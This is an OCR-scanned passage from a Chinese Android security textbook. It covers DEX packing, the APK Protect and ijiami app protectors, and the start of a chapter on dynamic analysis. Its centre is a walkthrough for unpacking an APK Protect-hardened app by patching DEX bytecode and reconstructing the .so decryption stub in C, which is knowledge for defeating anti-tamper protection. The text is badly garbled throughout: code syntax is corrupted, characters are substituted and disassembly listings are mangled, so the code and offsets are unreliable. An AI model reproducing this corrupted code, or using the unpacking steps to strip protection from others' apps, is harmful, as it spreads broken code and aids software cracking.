try{ 
Class obj_class = Class.forName(class_name); 
Field field = obj class.getDeclaredField(filedName); 
field.setAccessible(true); 
return field.get(null); 

} catch (SecurityException e) { 
ЇЇ TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (NoSuchFieldException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalArgumentException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalAccessException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (ClassNotFoundException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 

} 


return null; 


} 


public static void setFieldOjbect(String classname, String filedName, Object obj, Object filedVaule){ 

try { 
Class obj_class = Class.forName(classname); 
Field field = obj class.getDeclaredField(filedName); 
field.setAccessible(true); 
field.set(obj, filedVaule); 

) catch (SecurityException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

) catch (NoSuchFieldException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalArgumentException e) { 
I! TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalAccessException e) { 
И TODO Auto-generated catch block 
e.printStackTrace(); 

) catch (ClassNotFoundException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 


} 


public static void setStaticOjbect(String class_name, String filedName, Object filedVaule){ 
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try{ 
Class obj class = Class.forName(class name); 


Field field = obj class.getDeclaredField(filedName); 
field.setAccessible(true); 
field.set(null, filedVaule); 
) catch (SecurityException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 
} catch (NoSuchFieldException e) { 
11 TODO Auto-generated catch block 
e.printStackTrace(); 
} catch (IllegalargumentException e) { 
11 TODO Auto-generated catch block 
e.printStackTrace(); 
} catch (IllegalAccessException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 
} catch (ClassNotFoundException e) { 
11 TODO Auto-generated catch block 


e.printStackTrace(); 
} 
} 
} 
17.3.2 ИУ РА CESK 
当 解 壳 数 据 位 于 解 壳 程 序 文件 头 时 ， 此 时 的 加 壳 方 式 比较 复杂 ， 合 ES 
P eni er 
并 后 DEX 文件 的 具体 结构 如 图 17-3 所 示 。 checksum 
当 解 过 数据 位 于 解 达 程序 文件 头 时 ， 加 壳 Android DEX 的 具体 流程 signature 
пня. = 
СТ) 加 密 源 程序 APK 文件 为 解 壳 数据 。 map. off 
(2) 计算 解 壳 数据 长 度 ， 并 添加 该 长 度 到 解 克 DEX 文件 头 末尾 ， string ids, olf 
并 继续 解 过 数据 到 文件 头 末 尾 ， 插 入 数据 的 位 置 为 0x70。 e 
(3) 修改 解 这 程序 DEX 头 中 checksum, signature, file size. field ids off 
header size, string ids off, type ids off. proto ids off. field ids off. T 


data off 


method ids off. class defs off 和 data off 相关 项 。 
(4) 分 析 map off 数据 ， 修 改 相关 的 数据 偏 移 量 。 
(5) 修改 源 程序 AndroidManifest.xml 文件 ， 然 后 覆盖 解 壳 程序 


AndroidManifestxml 文件 。 
当 解 壳 数据 位 于 解 壳 程 序 文件 头 时 ， 解 克 Android DEX 的 基本 流程 


如 下 所 示 。 
CL) 从 0x70 处 读 取 解 过 数据 长 度 。 
(2) 从 DEX 文件 读 取 解 壳 数据 ， 解 密 解 达 数据 ， 然 后 以 文件 形式 REEDEX Body 


保存 解密 数据 到 APK 文件 ， 例 如 a.apk。 
(3) 通过 DexClassLoader 动态 加 载 到 文件 a.apk。 


图 17-3 合并 后 DEX 的 结构 
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174 第 三 方 工 具 一 一 APK Protect 


GE 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 17 章 \ 第 三 方 工具 一 一 APK Protect.avi 

APK Protect 是 一 款 免费 的 安 卓 软件 保护 工具 , 可 以 保护 APP 应 用 程序 不 被 破解 、 逆 向 分 析 和 盗版 -APK 
Protect 通过 阻止 反 编译 软件 、 代 码 混淆 加 密 、 字 符 串 加 密 、 类 名 加 密 等 方式 使 被 保护 过 的 APP 难以 被 反 编 
译 逆 向 分 析 ， 从 而 达到 保护 APP 不 被 破解 的 目的 。 在 本 节 的 内 容 中 ， 将 详细 讲解 APK Protect 的 基本 知识 。 


17.4.1 APK Protect 的 功能 


(1) 阻止 反 编译 功能 

O АРК Protect 能 阻止 Apktool 等 反 编译 工具 的 反 编 译 功能 。 

0 АРК Protect 会 对 保护 的 APP 类 名 进行 加 密 , 使 用 jd-gui 等 反 编译 工具 反 编译 出 的 类 名 无 法 静态 阅读 。 

(2) 代码 混淆 加 密 功 能 

APK Protect 支持 对 APP 的 代码 流程 进行 乱 序 混淆 加 密 ， 例 如 ， 在 加 密 前 使 用 静态 反 编译 查看 到 的 代码 
流程 为 1、2、3、4、5、6， 在 APK Protect 加 密 后 再 使 用 静态 反 编译 查看 到 的 代码 流程 变 成 了 3、1、6、4、 
2、5， 与 加 密 前 差异 很 大 ， 这 样 大 大 提升 了 静态 逆向 分 析 的 难度 。 

(3) 字符 串 加 密 功 能 

APK Protect 支持 对 APP 的 Java 字符 串 进 行 Base64 等 加 密 ， 加 密 后 使 用 jd-gui 等 反 编译 后 看 到 的 字符 
串 都 是 加 密 后 的 ， 这 样 将 无 法 阅读 ， 也 就 无 法 利用 字符 串 来 猜测 代码 功能 和 定位 功能 代码 。 


17.4.2 ”使 用 APK Protect 


读者 可 以 登录 APK Protect 的 官方 网 站 下 载 APK Protect， 地 址 是 http:/www.apkprotect.com/， 如 图 17-4 
所 示 。 
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图 17-4 APK Protect 官方 网 站 


(1) 在 APK Protect 的 官方 网 站 注册 一 个 免费 账号 ,会 员 用 户 可 以 使 用 官方 的 在 线 加 密 工具 。 当 然 
使 用 免 安装 单机 版 最 便捷 ， 此 版 本 下 载 超 链接 是 http://d.qimada.com/opt/root/APK_Protect.zip， 官 方 介绍 
如 图 17-5 所 示 。 
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Guide 


1. Download APK Protect.zip. 

2. Decompress the downloaded file. 

3. Run “apkcrypt.exe”, select the APK you need to encrypt and click "ADD 
APK PROTECT." 


图 17-5 免 安装 单 机 版 的 官方 介绍 


(2) 下 载 后 得 到 一 个 名 为 APK_Protect.zip 的 压缩 包 ， 解 压缩 下 载 文件 ， 运 行 apkcrypt.exe， 然 后 选择 
需要 加 密 的 APK， 单 击 ADD APK PROTECT 按钮 开始 加 密 ， 如 图 17-6 所 示 。 


APK PROTECT Step 1. Click “BROWSE” to 
select the APK you need to 
A encrypt. 


Step 2. Rename the APK here 


Step 3. Click this button 
to complete encryption. 


Р 17-6 APK Protect 加 密 界面 


17.4.8 ”实战 演练 一 一 APK Protect 加 密 分 析 


下 面 将 通过 一 个 具体 实例 来 分 析 APK Protect 加 密 处 理 的 过 程 ， 在 本 实例 中 ， 将 对 АРК Protect 加 这 后 
的 АРК 进行 简单 的 分 析 。 因 为 已 经 使 用 APK Protect 对 文件 libapkprotect.so 进行 了 加 壳 处 理 ， 所 以 此 处 将 
把 加 固 的 APK 包 中 的 .so 文件 进行 分 析 。 


本 实例 用 到 的 工具 有 ida6.1、Dex2Jar、jdgui 和 readelf， 具 体 实现 流程 如 下 所 示 。 
(1) 使 用 Dex2Jar 转化 .so 文件 ， 如 图 17-7 所 示 。 


图 17-7 Dex2Jar 转化 “.so” 文 件 
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此 时 会 看 到 已 经 无 法 使 用 Dex2Jar 工具 进行 分 析 ， 这 是 APK Protect 加 壳 的 原因 。 提 示 蜡 常 的 方法 是 : 


Lcn/com/fmsh/cube/a/a;.a()Lcn/com/fmsh/cube/a/a 


由 此 可 见 ， 上 述 方法 在 cn.com.fmsh.a.a 类 中 实现 ， 方 法 名 是 a0， 返 回 


已 经 被 APK Protect 加 密 。 


的 是 类 cn.com.fmsh.a.a， 此 方法 


(2) 使 用 IDA pro 工具 定位 方法 a0， 按 Ctrl+rS 快捷 键 后 选择 CODE 段 ， 然 后 按 Alt+T 快捷 键 搜索 


cn.com.fmsh.cube.a.a.a 字符 串 来 迅速 定位 ， 如 图 17-8 所 示 。 


CODE :0008CCF8 
CODE: 0008CCF8 
CODE: 0008CCF8 
СОЕ: 0008ССЕВ 
CODE: 0008ССЕ8 
CODE : 6008ССЕВ 


Method 1992 (Bx7c8): 
public static cn.com.Fmsh.cube.a.a 
cn.con.fnsh.cube.a.a.a() 


# Ғ init QUL 27«68]j 
# FUNCTION CHUNK AT CODE:000838F& SIZE 90000000 BYTES 


locret: 
CODE : 0008ССЕВ 
CODE: 0008CCFS 
CODE:8008CCF8 # 
CODE: 6808CCFA 
CODE :B08CCFB 
CODE: 8008CCFC 
CODE :8008CCFD 
CODE: 008CCFE 
CODE : 0008CCFF 
СОрЕ:0008С000 
СОрЕ:0008С001 
CODE: 6008CD 82 
CODE: 8008CD83 
CODE: OB08CD a4 
tupe :0бовсро5 
СОрЕ:6008С006 
СОрЕ:6008С007 
cove: 
CODE : 
CODE: 
cone: 
cove: 
CODE: 
CODE: 
CODE: 
CODE: 
CODE: 


return-object 


而 在 未 加 过 之 前 ， 


public static cn cube а-а 
en.con.frch.c 


sget-object 


ой, word_1EFCh 


#" F_andt_QUL_27+60)5 
if-noz ой, loc aces? 
neu-Lnstance 
dnvoke-cirect 
sput-object 


vO, vord_1EFCh 


# CODE XREF: әәә. +1] 


Я 
loc 80062: T 
2 vO, vord_1EFCh 


sget-object 


locret: 


retura-object 


vo 


CODE: masc Method End 
(cone: 008CC66 в -—— - = = = = - 


图 17-9 未 加 壳 之 前 的 方法 字 节 码 
通过 对 比 图 17-8 和 图 17-9， 可 以 看 出 原来 的 字 节 码 已 经 被 加 密 了 。 


CODE XREF: Sender_sendparaaIL+cJ] 


ш CODE XREF: Sender senuDatamIL+GL| 


оов 3cinit)() a_init eu_0> 


(3) 为 了 能 够 让 Dex2jar 工具 反 编译 ， 需 要 修改 这 个 方法 字 节 码 。 把 APK 中 的 classes.dex 解压 出 来 ， 


on.googlecode -dex2jar-DexException: 
-bOLcn/con/fnsh/cube/a/b; 1 


然后 使 用 UE 定位 到 8ccf8, 使 用 0 替换 掉 所 有 的 8ccf8-8ccd14。 此 时 使 用 Dex2jar 工 具 进 行 反 编 译 ,执行 dex2jar 
classes.dex 后 的 效果 如 图 17-10 所 示 。 


while accept method:[Len/com/fmsh/cube/a/as 


at con.googlecode.dex2.jar.reader.DexFileReader.acceptHMethod(DexFi leReade 
ps. java:694> 


图 17-10 反 编 译 效果 


вте HABE О 


由 此 可 见 ， 方 法 b 也 被 加 密 了 。 在 IDA pro 中 快速 定位 此 方法 ， 如 图 17-11 所 示 。 


„byte и 
Method 1993 (8x7c9): 

public Final cn.con.fmsh.cube.a.b 
tn.con.fnsh.cube.a.a.b() 


" CODE XREF: Sender sendDataGIL«15| j 
init Әй 27«72]j 

shl-int/lit8 973, -0x2E 
rem-int/lit16 v0, об, -0x4D51 
nove-vide/Fromió 9232:0233, өз1533:0%153% 
new-array v8, v8, «t: unknown> 
xor-long v7 , vOzthis, vOzthis 
Method End 

| nove-vide/16 00:01, 04:05 


图 17-11 快速 定位 方法 b 
此 时 会 发 现 ，8cd230 指令 无 效 ， 如 图 17-12 所 示 。 


1712 无 效 指令 
(4) 使 用 UE 定位 并 修改 8cd24-80cd34， 如 图 17-13 所 示 。 
CODE Method 1 (0x1): 
CODE public java.lang.String 
CODE a.getProvider() 
CODE 
CODE " FUNCTION CHUNK AT CODE:0025CB28 SIZE 00000008 BYTES 
CODE 
CODE sput-object v128, word 9 
CODE goto loc_25CB28 
CODE Method End 


сппк 


图 17-13 修改 8cd24-80cd34 


(5) 同样 道理 ， 接 下 来 进行 如 图 17-14 所 示 的 替换 修改 处 理 。 


ex2jar classes.dex -> classes_dex2jar. jar 
on.googlecode.dex2jar.DexException: while accept method: {La;.getProvider¢>Ljaval 


‘lang/String; 1 


ex2jar classes .dex -> classes_dex2jar.jar 
on.googlecode.dex2jar.DexException: while accept method: [La;.getUersion()1] 


at com.googlecode .dex2jar.reader.DexFileReader.acceptMethod(DexFileReade 
P. java:694) 


Method 2 (0x2): 


public int 
a.getUeksion() 
UNUSED 
ushr-int/1its v82, v133, -2 
Method End 
f| a getProviderüL CODE 002SCBB8 00000006 R 
a getVersionfI CODE 002SCBD0 00000006 R 
Р 17-14 替换 修改 


(6) 完成 全 部 替换 工作 后 ， 就 可 以 正常 进行 Dex2jar 反 编 译 工作 了 ， 如 图 17-15 所 示 。 在 反 编 译 之 前 
需要 关闭 打开 的 classes.dex IDA, IJ jar 类 会 不 全 。 


ex2jar uersion: translator-0.0.9.15 


ex2jar classes.dex -> classes_dex2jar.jar 


图 17-15 成 功 反 编译 


хеее 


(7) 使 用 JD-GUI 工具 打开 反 编译 处 理 的 jar 包 ， 如 图 17-16 所 示 。 


| dasses dex2jarjar x 
80 88 android support. v4 | 
Ë ËB cn com. fash = 
$8. 
® 8 cube 
$a. 
日 出 com 
@ Beare 
eee 
Bee 
= 8 lala 
9 8 mapabe 
8 88 wobeta android dslv 
9 8 nelad 
8 8 alidinmena lib 
8 88 zeh safelottery 
= о ШШШ 
= Ө wkprotect. 
95 InitO : int 
$5 VersionO : int 
wi...) 


public class apkprotect 

t 
static 
t 


. loadLibrary|"spip: 


) 


public static native int Init(); 


public static native int Ver: 


17-16 打开 反 编 译 处 理 的 jar 包 
再 看 原来 的 APK 文件 ， 如 图 17-17 所 示 。 


ËB android. support. v4 
8 cn. com. fmsh 
日 出 con 
Maaa 
出 b 
Bes 
田 ËB lakala 
Ж mapabe 
ËB mobeta android. dslv 
98 newland 
8 slidingnenu.lib 
Ë BB zch. safelottery 


ВА 17-17 原来 的 APK 文件 


将 打开 的 jar 包 和 原来 的 APK 进行 对 比 ， 可 以 看 出 在 加 固 后 的 Dex 中 增加 了 类 apkprotect 和 一 个 类 a。 Ж 
apkprotect 会 加 载 apkprotectso, Init Version 是 JNI 方 法 ， 其 具体 实现 在 APK lib/armeabi/libapkprotect.so 中 。 
(8) 使 用 IDA pro 工具 反 编 译 .so 文件 ，Init 对 应 的 so0 函 数 如 图 17-18 所 示 。 


EXPORT Java com apkprotect Init 
Java con apkprotect Init 
LDRH RO, [R7,80x20] 
PUSH — (RI,R2,LR) 
LDR вт, [R1,R6] 
6 


1515 их 
dword 333€ DCD 0x7266F252, 0x8F687332, 818212995, BxC88865DA, 0x895071E3 
; DATA XREF: .text:000032B0fo 
10000333C DCD 0x7E0FCC7D, 0xD495D82C, Bx3622D6EF, BxBCOAEDD7, GxhDBFBGER 
10008333C DCD 6xR5B73R6F, 0xF8216DC6, 0х91895027, OÜxC1RR950R, OXBOESFBAF 
:0000333C DCD 6x7097E8DR, OxB5CU2R7D, 0x7B225018, 0х3287А052, 0x150BB326 
:0000333С DCD 0xN30D80CF, 0x63827hFB, Bx1543C35F, Bx85BB4B72, 0x20939RDC 


:0000333C DCD 6x78016608, OxES788BBC, UXDRADRILO, 0x3279Bh25, 0xñ15F0103 


DCD 0xB3Ch2819, OxDEA82537, 0x6FE3590D, 0x9DF0B5E7, gxhF53h9C5 
9xE2755978, OxAEAZFEOD, 0х208вавом, 0x83E4BB9C, Ox7F085107 


- Pane vorr- ravr-aaaaoranT 


图 17-18 Init 对 应 的 so0) 函 数 
由 此 可 见 ，Init 方法 已 经 被 加 密 了 。 


UE manage — 


(9) 接 下 来 开始 对 .so 进行 脱 壳 操 作 ， 从 so 导出 的 函数 中 找到 方法 JNI OnLoad， 此 方法 会 在 加 载 so 


时 被 Dalvik 虚拟 机 调用 ， 用 来 初始 化 或 注册 JNI 方法 ， 如 图 17-19 所 示 。 
ms DEC 
. aeabi unwind cpp prO 00008168 
Java com apkprotect Version 


apkprotect Init 


__aeabi_idivmod 000078F4 


图 17-19 ”找到 方法 JNL OnLoad 


因为 没有 Init 方法 和 Init 数组 ， 所 以 so 的 解密 流程 只 能 在 函数 INI OnLoad 中 实现 ， 如 图 17-20 所 示 。 


EXPORT JNI OnLoad 
JNI OnLoad 

B JMI OnLoad 0 

; End of function JNI_OnLoad 


17-20 函数 JNI OnLoad 


(10) 调用 JNI OnLoad 0， 然后 切换 到 执行 流程 视图 界面 ， 如 图 17-21 Pros 


омот. оаа 日 
|vae 120- -0x128 


PUSH — (Rü-R7,LR) 


LDR — R5, [R0,u0xC] 
моо вв, 

сє 85, 

loc 128à 


R2, [RO] 
RS, RB 
m2, #0 


loc 122F 
LDR з, [Rh] 
CMP — вз, #9 

BEQ 


Ra, [асти] 
Снр НЗ, #9 
ВЕД — loc 1224 


1721 ”执行 流程 视图 


NEU jud Ree Baix 


SUD — R7. RA, Wx 
Lor Ie] 

оов Ri, [FA] 

Lon юг, Fns,sax18]| 
aoo 

la. 

= 

BNE 


sub 1198 
R2, [85,8019] 
R2. 


RO, [R7] 
LOR — Ri. (RAJ 
mop — ни, ин 
э sub 110€ 
RO. 40 
loc 122 


+ 
loc_12E2 пос 120а 
MUS вв, а2 ноос нв, авс 
n loc 1282 loc 1206 
: End of functi 


图 17-21 执行 流程 视图 CE 
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此 时 可 以 得 到 对 应 的 逆向 分 析出 的 源码 ， 源 码 中 演示 了 解密 过 程 ， 具 体 代 码 如 下 所 示 。 


#define PC_ALIGNMENT 4 


#define PC_ALIGN( v) ((( v) + PC. ALIGNMENT - 1) & ~(PC_ALIGNMENT - 1)) 


/下 面 是 自 定义 结构 
typedef struct pack іпѓо{ 
int packed symbol count; 
intold JNI OnLoad offset; 
int default return value; 
int compress data length; 
int unknown2; 
unsigned char *compress data[1]; 
pack info; 


typedef struct packed symbol( 

int symbol start offset; 

int symbol size; 

int symbol start offset; 

int symbol size; 

unsigned int symbol instructions; 

unsigned int unknown instructions; 
)packed symbol; 


typedef struct. packed symbols( 
int compress symbols offset; 
int compress symbols page align length; 
packed symbol packed symbol; 

}раскеа symbols; 


const unsigned int rva = 0x10c7; 


int get pack info(bool &thumb flag 
unsigned int result = rva; 
if(result&1)( 
result--; 
thumb_flag = true; 
} 
result+=(0x90<<2); 
return result; 


} 


int alignPC(int value){ 
return PC_ALIGN(value); 
} 


11 *pack info is mapped гуа 
ШОМ! VERSION 1 4 
11 -»pack symbols 


I| *pack info is mapped гуа 
11 may be 


11 may be 
11 4 bytes of symbol instruction 


11 *pack info is mapped гуа 
// page alignment symbols size 


int do mprotect(void *address, int length, int prot flag)( 


#ifdef GNUC . 

mprotect(address, length, prot flag); 
#endif 

return 0; 
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} 


11 1 verify ok, 0 verify failed 
bool symbol verify(void *symbol va, int symbol length, unsigned int key)( 
bool fRet = true; 
if(symbol_length>=4){ 
unsigned int inss = *(unsigned int*)symbol_va; 
if(inss-key){ 
fRet = false; 
} 
} 
return fRet; 
} 


int cacheflush(void “start, void *end, long flags){ 
#ifdef__GNUC__ 

return cacheflush ( start, end, flags); 
#endif 

return 0; 


} 


void swap byte(unsigned char *p, unsigned char *pp)( 
char c = *p; 
*p = *pp; 
*pp = c; 

} 


void decompress(void *dest, int dest length, void *compress_data)( 
int i=0; 
unsigned int j=0,k=0; 
unsigned char *p = (unsigned char*)compress data; 
unsigned char *pp, *ppp, *dest ptr = (unsigned char*)dest; 


if(dest length)( 
for (;i<dest_length;i++) 


{ 


j<<=0x18; 

j>>=0x18; 

k = р+к; 

pp = р+ј; 

k<<=0x18; 

k>>=0x18; 

ppp = p*k; 

swap_byte(pp, ppp); 

dest ріг] ^= p[(p[j] *p[k])&0xff]; 


j+; 
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typedef int (*pfn_JNI_OnLoad)(void* vm, void* reserved); 


int call original jni onload(pfn JNI OnLoad pfn, int flag, 


) 


void *vm, void *reserved)( 
unsigned int address - (unsigned int)pfn; 
if(flag){ 
address+=(address&1 )+(~(address&1)); 
} 
return pfn(vm, reserved); 


int stub entry(void *vm, void *reserved){ 


bool thumb flag 7 0; 
char work buffer[0x130-8]-(0); 
int result = 0; 


int pack info va = alignPC(get pack info(thumb flag)); 


pack info * ppack info = 

(pack info*)((unsigned char*)pack info va); 
packed symbols *ppacked symbols = (packed symbols*) 

((unsigned char*)ppack info*ppack іпѓо->сотргеѕѕ data length); 
packed symbol *ppacked symbol = &ppacked symbols-»packed symbol; 


if(ppack info-»compress data length&& 
ppack info-»packed symbol count)( 


for (int i20; і<рраск info-»packed symbol count; i++) 
{ 
if(ppacked_symbol->symbol_size 
&&ppacked_symbols->packed_symbol._symbol_size) 
{ 
void *symbols_start = (unsigned char*)ppack_info 
*ppacked symbols-»compress symbols offset; 
if(0 != do mprotect(symbols start, 
ppacked symbols-»compress symbols page align length, 
7 
return Oxc; 
} 
void *symbol_va = (unsigned char*)ppack_info+ 
ppacked_symbols->packed_symbol.symbol_start_offset; 
if(symbol verify(symbol va, ppacked_symbol->symbol_size, 
ppacked symbol-»symbol instructions))( 
return 0; 
) 


memocpy(work buffer, ppack info-»compress data, 0x80««1); 
decompress((unsigned char*)ppack info* 


ppacked symbols-»packed symbol.symbol start offset, 
ppacked symbol-»symbol size, 


ШЭ. ££? € o R8 i8 sc 


work buffer); 


cacheflush((unsigned char*)ppack info* 
ppacked symbols-»packed symbol.symbol size, 
(unsigned char*)ppack info* 
ppacked symbols-»packed symbol.symbol size, 0); 


if(Isymbol verify(symbol va, ppacked symbol-»symbol size, 
ppacked symbol-»symbol instructions) )( 
return 2; 

} 


do_mprotect(symbols_start, 
ppacked_symbols->compress_symbols_page_align_length, 
5); 
} 
ppacked_symbols++; 
ppacked_symbol++; 


} 


if(ppack_info->old_JNI_OnLoad_offset){ 
result = call_original_jni_onload( 
(pfn_JNI_OnLoad) 
(pack info va*ppack info-»old JNI OnLoad offset), 
0, vm, reserved); 
Jelse( 
result = ppack info-»default retur value; 
) 


return result; 


H 
(11) 根据 解密 流程 可 以 实现 编码 和 脱 壳 工 作 ， 根 据 get pack info 和 alignPC 可 以 找到 pack info 的 
raw。 根 据 在 idb 中 对 get pack info 的 分 析 ， 可 以 得 出 raw 值 是 1308. 
pack_info 的 raw 排列 演示 如 下 所 示 。 


00001300 00 00 00 00 00 00 00 00 01 OO OO 00 45 1B 00 00 
00001310 04 00 01 00 14 05 00 00 14 01 00 00 9D 24 4F DS 


下 面 看 packed symbols 的 raw 的 计算 过 程 ， 其 计算 公式 是 : 
packed symbols=pack_info+[pack_info+0xc]=1308+514=181c 
是 packed symbols 的 计算 过 程 演 示 : 
00001810 al 8E 0С СЗ 1B DF 05 5A 8D EF 02 2D F8 0С 00 00 


00001820 00 20 00 00 DC 18 00 00 04 OC OO 00 DC 18 00 00 
00001830 04 OC 00 00 01 4B 7B 44 3A 00 AS 77 00 00 00 00 


所 示 。 
此 时 会 发 现 ， 方 法 的 指令 已 经 正常 显示 了 ， 这 说 明 可 以 用 IDA pro 进行 正常 的 分 析 工作 。 到 此 为 止 ， 对 
apkprotect.so 的 加 壳 操 作 全 部 介绍 完毕 。 
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33h EXPORT Java com apkprotect Init 
03334 Java com apkprotect Init 


text 00003334 
text:00083334 var 2AC = -вх2ас 
text:80083335 var 258 = -0x248 
text:00003334 var 244 = -0x244 
text :60003334 var 250 = -0x249 
= -8x230 I 
= -Bx234 
= -0x230 
= -0x130 
= -gx2C 


PUSH — (RA-R7Z,LR) 
+ R11 


ноу 
ноу R6, R18 

ноу R5, R9 

ноу Rh, R8 

PUSH — (Rh-R7) 

LDR Rh, =0xFFFFFDDN 
MUS — R2, 80x81 

MUS — Ri, #0 je 
ADD SP, Rh 


LDR R4, -( stack chk guard ptr - 0x3352) 


图 17-22 ”分 析 脱 壳 后 的 .so 文件 
17.5 第 三 方 工具 一 一 爱 加 密 


Фин 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 17 章 \ 第 三 方 工具 一 一 爱 加 密 .avi 
爱 加 密 是 北京 智 游 网 安 科技 有 限 公司 推出 的 针对 APP 加 密 的 平台 ， 主 要 提供 了 应 用 保护 、 渠 道 监测 和 
安全 检测 3 项 服务 。 爱 加 密 的 官方 地 址 是 http:/www.ijiami.cn/， 如 图 17-23 所 示 。 


PEA 98-с. ка ра - Ol ж Ow 


Ө cis mnt Ө тев P LE CI 


O App 安全 现状 


ап ЖТС, жери оза. WAELE SSSA EASA 
ж. ховвтенкананви, аюмен. HERES. азаэрралашта. RERE 


OR 和 = 


1723 爱 加 密 官方 地 址 


爱 加 密 是 一 个 针对 APP 加 密 的 平台 ， 可 以 防止 应 用 在 运营 推广 过 程 中 被 反 编译 、 恶 意 自 改 、 注 入 扣 费 
代码 、 盗 取 数 据 等 ， 保 护 应 用 的 安全 性 、 稳 定性 ， 同 时 对 开发 者 的 应 有 收入 提供 有 力 保障 。 爱 加 密 的 加 密 
过 程 不 需要 应 用 改动 任何 源 代码 ， 而 且 应 用 效率 也 不 会 受到 任何 影响 。 爱 加 密 提 供 所 有 主流 渠道 的 监测 服 
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务 ， 开 发 者 可 以 第 一 时 间 了 解 应 用 正版 和 盗版 情况 ， 保 护 开发 者 利益 。 
第 三 方 工具 爱 加 密 提供 了 如 下 所 示 的 服务 。 


02 防 逆向 分 析 防 止 通过 APKTool、IDA Pro 等 反 编译 工具 破解 DEX 文 件 ， 从 而 获取 APK 源 代码 ， 保 护 
代码 层 安 全 。 

О 防 恶 意 算 改 校 验 APK 完 整 性 ， 自 动 终止 运行 被 自 改 的 APK, 二 次 打包 后 应 用 都 无 法 使 用 ,杜绝 盗版 
应 用 的 出 现 。 

口 ” 防 内 存 窃取 ， 防 止 通 过 gdb、gcore 从 内 存 中 截取 DEX 文 件 ， 获 取代 码 片段 ， 从 而 反 编译 还 原 APK 进 
行 不 法 操作 。 

口 ” 防 动态 跟踪 防止 通过 ptrace 调 试 进程 ， 跟 踪 、 拦 截 、 修 改正 在 运行 的 应 用 ， 进 行动 态 注入 ， 保 护 程 
序 运行 安全 。 

爱 加 密 的 主要 特点 如 下 所 示 。 

о 操作 简单 : 开发 者 只 需 注册 登录 平台 并 上 传 应 用 ，10 分 钟 内 即 可 完成 加 密 ， 然 后 使 用 签名 工具 签名 
后 就 可 直接 上 传 。 

а 原生 保留 : 开发 者 无 需 修 改 APP 源 码 ， 只 需 上 传 APK 包 即 可 完成 加 密 ， 加 密 过 程 中 不 会 修改 任何 文 
件 ， 不 加 入 任何 第 三 方 服务 。 

O 风险 规避 : 加 密 后 防止 APK 被 反 编 译 、 媒 入 病毒 、 恶 意 扣 费 SDK、 广 告 SDK、 非 法 汉化 等 ， 将 APP 
被 破解 打包 的 风险 降 为 0。 

а “完美 性 能 : 加 密 后 无 需 调 试 ， 保 证 性 能 不 会 受到 任何 影响 ， 保 持原 有 运行 效率 ， 且 APP 对 系统 和 机 
型 的 适 配 性 不 受到 任何 影响 。 

O AMAP: 对 DEX 文 件 、 资 源 文件 、 主 配 文件 、SO 库 文件 、 内 存 数据 、 签 名 文件 进行 专业 保护 ， 


全 面 防止 静态 破解 和 动态 破解 。 


第 18 章 动态 分 析 和 调试 


随 着 Android 用 户 的 增多 ， 针 对 Android 系统 的 恶意 软件 越 来 越 多 ， 所 以 分 析 Android 应 用 变 得 越 来 越 
重要 。 目 前 ， 分 析 Android APK 的 工具 有 静态 分 析 工 具 和 动态 分 析 工 具 两 种 。 其 中 ， 静 态 分 析 主 要 是 反 编 
译 APK 文件 ， 分 析 反 编译 之 后 的 代码 。 动 态 分 析 主 要 是 让 程序 运行 起 来 ， 获 取 程序 运行 过 程 中 产生 的 API 
调用 ， 从 而 获取 其 行为 信息 。 本 章 将 详细 讲解 动态 分 析 Android APK 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 
知识 打下 基础 。 


18.1 常用 的 动态 分 析 行 为 
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在 目前 技术 环境 下 ， 通 过 动态 分 析 可 以 分 析 程 序 的 很 多 行为 ， 具 体 说 明 如 下 所 示 。 

(1) 程序 启动 的 Activity. Service. BroadcastReceiver 组件 。 

(2) 获取 程序 root 权限 。 

(3) 程序 文件 操作 ， 例 如 打开 、 读 写 、 关 闭 文件 。 

(4) 程序 数据 库 操作 。 

C50 程序 短信 发 送 、 录 音 、 定 位 、 获 取 手 机 IMEIIMSI/ 电 话 号 码 、 拨 打 电话 、 电 话 状态 监听 、 终 止 短 
信 接 收 、 改 变 电 话 状态 〈 例 如 挂 断 、 接 听 ) 。 

(6) 程序 通讯 录 、 通 话 记录 、 短 信 数 据 库 获 取 。 

CD 程序 访问 网 络 URL. IP 地 址 和 端口 号 、 网 络 抓 包 。 

(8) 程序 开机 自 启 动 、 接 收 短信 行为 、 电 话 。 

(9) 动态 权限 获取 。 

(10) 程序 ptrace 注入 、dexclassloader 加 载 、Java 反射 调用 。 

СТІ) 程序 开机 自 启动 。 

目前 ,市 面 中 主流 的 动态 分 析 工 具有 IDA Pro. APIMonitor 和 DroidBox。 其 中 ,DroidBox 是 基于 TaintDroid 
构建 的 分 析 工 具 。TaintBox 的 工作 原理 是 在 Dalvik 目录 中 增加 了 对 对 象 的 操作 类 Taintcpp， 并 在 对 象 中 增 
加 u8 tag 变量 。 存 储 标 识 ， 完 成 了 对 关键 数据 的 污点 标记 。 当 程序 通过 АРІ 获取 敏感 信息 时 ， 利 用 封装 的 
Taint 类 标识 数据 污点 。 


182 Android 中 的 动态 调试 
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调试 Android 程序 的 方式 分 为 两 种 情形 ， 第 一 种 是 调试 用 Java 编写 的 应 用 程序 ， 一 种 是 用 C 和 C++ 开 
发 的 NDK 项 目 。 在 Java 编写 的 程序 中 通过 抛 出 异常 可 以 发 现 程序 的 问题 所 在 ， 例如， 在 文件 


Android 系统 安全 和 反 编译 实 点 


ActivityManagerService.java 的 startActivity 中 ,通过 new Exception("print stack").printStaceTrace() 代 码 可 以 得 


到 如 


下 输出 结果 。 
05-18 17:33:55.899 W/System.err(252): java.lang.Exception: print trace 


05-18 17:33:55.899 W/System.err(252): at com.android.server.am.ActivityManagerService.startActivity(Activity 
ManagerService.java:2493) 


05-18 17:33:55.899 W/System.err(252): at android.app.ActivityManagerNative.onTransact(ActivityManagerNative. 
java:131) 


